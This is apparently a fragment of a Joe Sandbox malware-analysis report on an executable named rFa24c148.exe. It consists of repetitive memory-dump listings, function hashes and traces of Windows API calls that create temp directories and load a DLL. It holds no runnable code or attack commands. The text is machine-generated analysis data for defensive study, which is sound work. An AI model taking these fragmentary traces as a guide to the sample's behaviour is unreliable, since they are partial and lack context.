                                                                                              • Instruction ID: f26dffa8f28471d2a1f864ee7fcc23407611118f3e7675527ed35a3aab9678e5
                                                                                              • Opcode Fuzzy Hash: 3b6d012946cdb1e415ed4126777acf452f9caf94abf9bf389c8640f9b16c30f7
                                                                                              • Instruction Fuzzy Hash: A2E0ECB4A00209AFDB009F64EC49E6B7BBDEB04304BC08521A914F2290E774E9158A69
                                                                                              APIs
                                                                                                • Part of subcall function 0040600B: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\rFa24c148.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 0040606E
                                                                                                • Part of subcall function 0040600B: CharNextW.USER32(?,?,?,00000000), ref: 0040607D
                                                                                                • Part of subcall function 0040600B: CharNextW.USER32(?,"C:\Users\user\Desktop\rFa24c148.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 00406082
                                                                                                • Part of subcall function 0040600B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 00406095
                                                                                              • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 004031EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 4115351271-517883005
                                                                                              • Opcode ID: 5bba806fd268ccce2495cde90ed89ee42926b4d772fe7f9e27bf52b1a3d679d8
                                                                                              • Instruction ID: a230b304c224a04ada09734fd21535f6fc799ebba56fb899572f26a9c12bfdf8
                                                                                              • Opcode Fuzzy Hash: 5bba806fd268ccce2495cde90ed89ee42926b4d772fe7f9e27bf52b1a3d679d8
                                                                                              • Instruction Fuzzy Hash: B3D0A92221693131D562362A3D02FCF080C8F0A719F12C03BF805B60C2CB6C0A8208FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9404108dc2ffa93cf9dbd592045f3814a42928f44e5f517cd318150646a2bbb9
                                                                                              • Instruction ID: a6beba8b11f6780db01d9b07fb449380a5bf126b8b7197de7c08299569837353
                                                                                              • Opcode Fuzzy Hash: 9404108dc2ffa93cf9dbd592045f3814a42928f44e5f517cd318150646a2bbb9
                                                                                              • Instruction Fuzzy Hash: 32A14471E00228CBDF28CFA8C8946ADBBB1FF45305F11856ED856BB281C7785A96DF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dbf333d6a46afa479c661894eff01412675f064c8667a178dbd89034fa802b91
                                                                                              • Instruction ID: 30ee09c6b26f98e8194536109d7ce3e20b902e709c9d9403a9562c61d449f9ad
                                                                                              • Opcode Fuzzy Hash: dbf333d6a46afa479c661894eff01412675f064c8667a178dbd89034fa802b91
                                                                                              • Instruction Fuzzy Hash: 8F913470E00228CBEF28CF98C8947ADBBB1FB45305F15816AD856BB281C7785A96DF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 068e376bb2d48232eda5806566f84189e2cd5aae6c77d5a6e3260a5cdfbff91e
                                                                                              • Instruction ID: b50c8aa62e1022faa0523462bc9082c254a891c8b7a0b6d235230cb6e00c602c
                                                                                              • Opcode Fuzzy Hash: 068e376bb2d48232eda5806566f84189e2cd5aae6c77d5a6e3260a5cdfbff91e
                                                                                              • Instruction Fuzzy Hash: D0817971D04228CFDF24CFA8C884BADBBB1FB44305F25816AD856BB281C7385A96CF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 90f7c6b476e538f5c80f6919ee05a76f5c0a6b18d6d689b251d68ff18896e93f
                                                                                              • Instruction ID: 91081cf311d25a809012e225b52d4c3b5f250b1ae059806297d05f5390b66a1f
                                                                                              • Opcode Fuzzy Hash: 90f7c6b476e538f5c80f6919ee05a76f5c0a6b18d6d689b251d68ff18896e93f
                                                                                              • Instruction Fuzzy Hash: BB817A71D04228CBEF24CFA8C8847ADBBB1FB44305F11816AD856BB2C1C7785A96DF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b93bd20ea5de8414a65fbfeb926355070cd3711eb5f3dddd59222d5fbdffa392
                                                                                              • Instruction ID: 08aa30644361a6a90b4bfdee527cb0e90186f6812c849098392b6a7b032e4156
                                                                                              • Opcode Fuzzy Hash: b93bd20ea5de8414a65fbfeb926355070cd3711eb5f3dddd59222d5fbdffa392
                                                                                              • Instruction Fuzzy Hash: D5712571E04228CFDF24CFA8C894BADBBB1FB45305F15806AE856BB281C7385996DF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 544fe90661504b3f73bb457df6893ab302009ecc2b1f879340368463567d4392
                                                                                              • Instruction ID: 4a61f6f80671d808dc41601989bb6c43c22881685a3a15352730304741b477df
                                                                                              • Opcode Fuzzy Hash: 544fe90661504b3f73bb457df6893ab302009ecc2b1f879340368463567d4392
                                                                                              • Instruction Fuzzy Hash: 10714771E04228CFEF24CFA8C894BADBBB1FB44305F15806AD856BB281C7785956DF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 62b97cb57a72ce22a6d8feb282019d17567d0fea9520e3f831b09b876e97210d
                                                                                              • Instruction ID: f5c122442136fd671463674f3a0102546b50c27f43e6df69360a8f4413a57d7a
                                                                                              • Opcode Fuzzy Hash: 62b97cb57a72ce22a6d8feb282019d17567d0fea9520e3f831b09b876e97210d
                                                                                              • Instruction Fuzzy Hash: 63715771E04228CBEF24CF98C884BADBBB1FB45305F15806AE856BB291C7785A56DF44
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                • Part of subcall function 00405021: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 00405059
                                                                                                • Part of subcall function 00405021: lstrlenW.KERNEL32(004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405069
                                                                                                • Part of subcall function 00405021: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,004030DB,004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,0040FE48,00000000), ref: 0040507C
                                                                                                • Part of subcall function 00405021: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll), ref: 0040508E
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050B4
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050CE
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050DC
                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
